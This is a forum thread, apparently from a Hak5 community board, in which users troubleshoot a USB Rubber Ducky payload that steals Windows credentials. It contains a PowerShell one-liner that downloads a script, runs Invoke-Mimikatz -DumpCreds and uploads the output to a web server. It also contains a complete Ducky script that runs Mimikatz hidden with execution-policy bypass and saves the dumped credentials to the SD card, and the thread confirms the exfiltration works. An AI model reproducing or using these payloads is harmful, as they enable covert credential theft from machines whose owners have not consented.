Help with Output

[Exmix]

So messing with this Payload I found here: https://www.hak5.org/blog/15-second-password-hack-mr-robot-style

I got it all working up to the point where it tries to output the file back to my Web Server. I get an error that says:
 

Exception calling "UploadString" with "2" argument(s): "The remote server returned and error: (405) Method not allowed."

At line:1 char:156

+ IEX (New-Object Net.WebClient).DownloadString('Http://MyWebServer/im.ps1'): $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString <<<< ('Http://MyWebServer/rx.php', $output)

+CategoryInfo : NotSpecified: (:) []. MethodInvocationException

+FullyQualifiedErrorID : DotNetMethodException

So I was looking into this error for a while and I can't really find much on how to fix this. My WebServer is Windows 2012 R2. I was wondering if anyone could help me fix this part here possibly OR help with how to just output it to a .txt file or something on the SD Card since I have my duck as the TwinDuck.

[ThoughtfulDev]

Are you sure that php is enabled in your apache or IIS webserver?

try to place a php file e.g test.php in the webdirectory root with the following content:

<?php
phpinfo();
?>

if you now visit yourwebserver/test.php you should see a table with some information if php is enabled.

 

I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz

REM -------------------------------------------------------------------------------------
REM Get drive letter of drive with label DUCKY
REM -------------------------------------------------------------------------------------
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
ENTER
DELAY 500
REM -------------------------------------------------------------------------------------
REM Copy and execute Invoke Mimikatz
REM -------------------------------------------------------------------------------------
STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';"

Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.

[Exmix]

10 hours ago, ThoughtfulDev said:

Are you sure that php is enabled in your apache or IIS webserver?

try to place a php file e.g test.php in the webdirectory root with the following content:

<?php
phpinfo();
?>

if you now visit yourwebserver/test.php you should see a table with some information if php is enabled.

 

I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz

REM -------------------------------------------------------------------------------------
REM Get drive letter of drive with label DUCKY
REM -------------------------------------------------------------------------------------
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
ENTER
DELAY 500
REM -------------------------------------------------------------------------------------
REM Copy and execute Invoke Mimikatz
REM -------------------------------------------------------------------------------------
STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';"

Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.

Wow, I feel so silly. That's the one thing I didn't check... I got it running on there with no issues as soon as I Installed and enabled php. Thank you so much.

 

Also I like your script as well, i'll grab that and save it for when I wanna try that. Seems simpler and doesn't require internet connection.